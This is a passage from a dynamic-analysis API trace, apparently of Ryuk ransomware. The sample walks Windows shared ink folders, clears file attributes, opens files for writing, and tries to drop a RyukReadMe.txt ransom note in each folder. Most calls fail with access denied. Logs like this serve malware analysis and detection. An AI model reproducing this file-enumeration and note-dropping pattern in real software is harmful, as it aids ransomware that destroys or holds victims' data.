0xffffffffffffffff [0161.293] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.293] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.293] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.293] SetLastError (dwErrCode=0x0) [0161.293] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.293] GetLastError () returned 0x5 [0161.293] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0161.293] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.293] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2f40 [0161.293] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.293] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.293] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.293] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", dwFileAttributes=0x80) returned 0 [0161.294] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.294] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.294] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.294] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0161.294] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0161.294] SetLastError (dwErrCode=0x0) [0161.294] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.294] GetLastError () returned 0x5 [0161.294] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0161.294] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.294] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.294] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.295] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", dwFileAttributes=0x80) returned 0 [0161.295] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.295] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.295] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.295] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.295] SetLastError (dwErrCode=0x0) [0161.295] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.295] GetLastError () returned 0x5 [0161.295] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0161.295] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.295] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2f40 [0161.295] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.295] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.295] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.296] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", dwFileAttributes=0x80) returned 0 [0161.296] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.296] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.296] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.296] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0161.296] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0161.296] SetLastError (dwErrCode=0x0) [0161.296] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.296] GetLastError () returned 0x5 [0161.296] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0161.296] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.296] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.296] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.297] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml", dwFileAttributes=0x80) returned 0 [0161.297] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.297] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.297] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.297] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.297] SetLastError (dwErrCode=0x0) [0161.297] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.297] GetLastError () returned 0x5 [0161.297] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0161.297] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.297] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2f40 [0161.297] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.297] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.297] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.298] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", dwFileAttributes=0x80) returned 0 [0161.298] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.298] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.298] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.298] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0161.298] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0161.298] SetLastError (dwErrCode=0x0) [0161.298] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.298] GetLastError () returned 0x5 [0161.298] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0161.298] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.298] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.298] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.299] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", dwFileAttributes=0x80) returned 0 [0161.299] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.299] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.299] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.299] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.299] SetLastError (dwErrCode=0x0) [0161.299] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.299] GetLastError () returned 0x5 [0161.299] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0161.299] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.299] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2f40 [0161.299] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.299] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.299] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.300] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", dwFileAttributes=0x80) returned 0 [0161.300] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.300] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.300] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.300] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0161.300] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0161.300] SetLastError (dwErrCode=0x0) [0161.300] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.300] GetLastError () returned 0x5 [0161.300] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0161.300] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.300] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.300] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.301] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", dwFileAttributes=0x80) returned 0 [0161.301] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.301] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.301] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.301] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.301] SetLastError (dwErrCode=0x0) [0161.301] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.301] GetLastError () returned 0x5 [0161.301] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0161.301] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.301] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2f40 [0161.301] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.301] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.301] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.302] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", dwFileAttributes=0x80) returned 0 [0161.302] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.302] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.302] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.302] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.302] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.302] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", dwFileAttributes=0x80) returned 0 [0161.302] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.302] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.302] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.303] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.303] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.303] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", dwFileAttributes=0x80) returned 0 [0161.303] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.303] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.303] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.303] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0161.303] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0161.303] SetLastError (dwErrCode=0x0) [0161.303] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.303] GetLastError () returned 0x5 [0161.303] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0161.303] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.304] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.304] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.304] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", dwFileAttributes=0x80) returned 0 [0161.304] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.304] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.304] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.304] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.304] SetLastError (dwErrCode=0x0) [0161.304] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.304] GetLastError () returned 0x5 [0161.304] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0161.304] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.304] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2f40 [0161.305] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.305] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.305] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.305] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", dwFileAttributes=0x80) returned 0 [0161.305] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.305] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.305] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.305] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0161.305] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0161.305] SetLastError (dwErrCode=0x0) [0161.305] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.306] GetLastError () returned 0x5 [0161.306] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0161.306] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.306] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.306] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.306] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", dwFileAttributes=0x80) returned 0 [0161.306] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.306] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.306] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.306] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0161.306] FindClose (in: 